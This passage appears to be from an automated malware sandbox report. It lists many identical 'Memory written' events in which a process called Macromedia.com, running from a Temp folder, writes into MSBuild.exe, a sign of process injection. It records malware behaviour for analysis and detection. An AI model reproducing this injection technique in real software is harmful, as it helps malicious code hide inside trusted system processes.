                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3C28
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3C8C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3CF0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3D54
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3DB8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3E1C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3E80
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3EE4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3F48
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3FAC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4010
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4074
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B40D8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B413C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B41A0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4204
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4268
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B42CC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4330
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4394
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B43F8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B445C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B44C0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4524
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4588
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B45EC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4650
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B46B4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4718
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B477C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B47E0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4844
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B48A8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B490C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4970
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B49D4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4A38
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4A9C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4B00
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4B64
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4BC8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4C2C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4C90
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4CF4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4D58
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4DBC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4E20
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4E84
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4EE8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4F4C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4FB0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5014
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5078
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B50DC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5140
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B51A4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5208
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B526C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B52D0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5334
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5398
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B53FC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5460
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B54C4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5528
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B558C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B55F0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5654
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B56B8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B571C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5780
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B57E4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5848
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B58AC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5910
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5974
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B59D8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5A3C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5AA0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5B04
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5B68
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5BCC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5C30
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5C94
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5CF8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5D5C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5DC0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5E24
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5E88
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5EEC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5F50
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B5FB4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6018
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B607C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B60E0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6144
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B61A8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B620C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6270
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B62D4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6338
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B639C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6400
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6464
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B64C8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B652C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6590
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B65F4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6658
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B66BC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6720
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6784
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B67E8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B684C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B68B0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6914
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6978
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B69DC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6A40
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6AA4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6B08
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6B6C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6BD0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6C34
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6C98
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6CFC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6D60
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6DC4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6E28
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6E8C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6EF0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6F54
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B6FB8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B701C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7080
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B70E4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7148
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B71AC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7210
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7274
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B72D8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B733C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B73A0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7404
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7468
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B74CC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7530
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7594
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B75F8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B765C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B76C0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7724
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7788
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B77EC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7850
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B78B4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7918
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B797C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B79E0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7A44
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7AA8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7B0C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7B70
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7BD4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7C38
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7C9C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7D00
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7D64
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7DC8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7E2C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7E90
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7EF4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7F58
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B7FBC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8020
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8084
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B80E8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B814C
